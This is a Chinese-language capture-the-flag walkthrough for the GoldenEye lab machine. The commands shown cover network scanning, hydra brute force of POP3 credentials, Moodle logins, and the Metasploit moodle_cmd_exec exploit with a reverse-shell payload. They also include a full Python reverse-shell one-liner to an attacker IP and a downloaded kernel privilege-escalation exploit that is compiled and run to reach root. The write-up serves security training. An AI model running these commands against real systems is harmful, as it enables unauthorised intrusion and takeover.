1.信息收集

arp-scan -l

nmap -sP 192.168.19.0/24

发现靶机为192.168.19.143

nmap 192.168.19.143

发现开放的端口

访问网站

发现登录页面http://192.168.19.143/sev-home/没有头绪

查看http://192.168.19.143页面源码，打开js文件

发现提示，提取两个人名，可能为用户名boris和natalya

还有一串HTML编码的密码

InvincibleHack3r

打开BurpSuit进行解码（HTML解码）

InvincibleHack3r

回到刚才的登录页面尝试登录

通过用户名boris和密码InvincibleHack3r成功登录

发现提示，pop3服务再一个非常高的并且非默认的端口运行，在刚才的扫描中并没有发现，下面进行一个全端口扫描

nmap -p- 192.168.19.143

发现两个端口55006、55007

对这两个端口进行仔细扫描

nmap -sV -sS -T4 -A -p55006,55007 192.168.19.143

发现服务确实为pop3的邮箱服务，并且在前面的提示中说让boris更改默认密码

尝试暴力破解

echo -e 'natalya\nboris' > goldeye.txt  将用户名写入一个用户名文件goldeye.txt中

将/usr/share/wordlists/fasttrack.txt文件拷贝到当前目录下，也可以直接用

使用命令

hydra -L goldeye.txt -P fasttrack.txt 192.168.19.143 -s 55007 pop3

用户boris  密码secret1!

用户natalya密码bird

通过NC登录pop3查看邮件内容

nc 192.168.19.143 55007  连接到邮箱

user boris               登录用户boris

pass secret1!            设置登录密码secret1！

list                     查看邮件详情

retr 1                   读取第一封邮件

在第二封邮件看到了另外一个用户名密码，并且要求我们在本地服务hosts中添加域名信息：

用户名：xenia

密码：RCP90rulez!

域：severnaya-station.com

网址：severnaya-station.com/gnocertdir

根据邮件提示添加本地域名：severnaya-station.com

vim /etc/hosts

将192.168.19.143   severnaya-station.com

加入其中

访问网页，发现这是一个开源的CMS系统moodle，发现最右侧可以登录，用刚才找到的账号密码登录

登录之后

在home >my profile >message 中发现一个用户名doak（并且发现此cms版本为2.2.3）

尝试爆破

hydra -l doak -P fasttrack.txt 192.168.19.143 -s 55007 pop3

得到

用户名doak 密码goat

查看其邮箱内容，发现

用户名dr_doak 密码4England!

使用此账号密码登录cms后台，发现了一个隐藏文件

http://severnaya-station.com/dir007key/for-007.jpg

访问此图片文件

将图片下载到本地文件夹中

wget http://severnaya-station.com/dir007key/for-007.jpg

检查图片内容

binwalk（路由逆向分析工具）

exiftool（图虫）

strings（识别动态库版本指令）

exiftool for-007.jpg

strings for-007.jpg

用以上命令都可以查看到base64编码隐藏信息：eFdpbnRlcjE5OTV4IQ==

使用Burpsuite破解获得密码：xWinter1995x!

根据提示说这是admin的密码，登录刚才的cms后台路径

搜索和此moodle cms相关的exp利用

Moodle 2.2.3 exp cve   --> CVE-2013-3630 漏洞可利用！ 29324

MSF渗透工具使用

msfconsole                        ---进入MSF框架攻击界面

search moodle                     ---查找 moodle类型 攻击的模块

use 0                             ---调用0  exploit/multi/http/moodle_cmd_exec调用攻击脚本

set username admin                ---设置用户名：admin

set password xWinter1995x!        ---设置密码：xWinter1995x!

set rhost severnaya-station.com   ---设置：rhosts severnaya-station.com

set targeturi /gnocertdir         ---设置目录： /gnocertdir

set payload cmd/unix/reverse      ---设置payload：cmd/unix/reverse

set lhost 192.168.4.231           ---设置：lhost 192.168.19.147（需要本地IP）

exploit  ----执行命令

python -c 'import pty;pty.spawn("/bin/bash")'

建立交互式shell

uname -a 查看内核

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

另一种获取shell的方式

python一句话反弹shell

开启一个监听

nc -vlp 6666

来到admin后台保存下面语句（记得修改IP）

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.19.147",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

保存后来到此目录下点击abc

拿到shell

内核提权

searchsploit 37292

找到此文件，然后find找到它（也可以用locate查找）

拷贝到自己创建的goldeye文件夹中，将143行的gcc改变为cc

保存

开启一个简易的http服务，将此文件上传至靶机

python -m SimpleHTTPServer 8081

在靶机上下载此文件

wget http://192.168.19.147:8081/37292.c  切记带上端口号

cc -o goldeye 37292.c

将此文件进行编译成goldeye文件

添加执行权限

chmod +x goldeye

执行此文件

./goldeye

cat /root/.flag.txt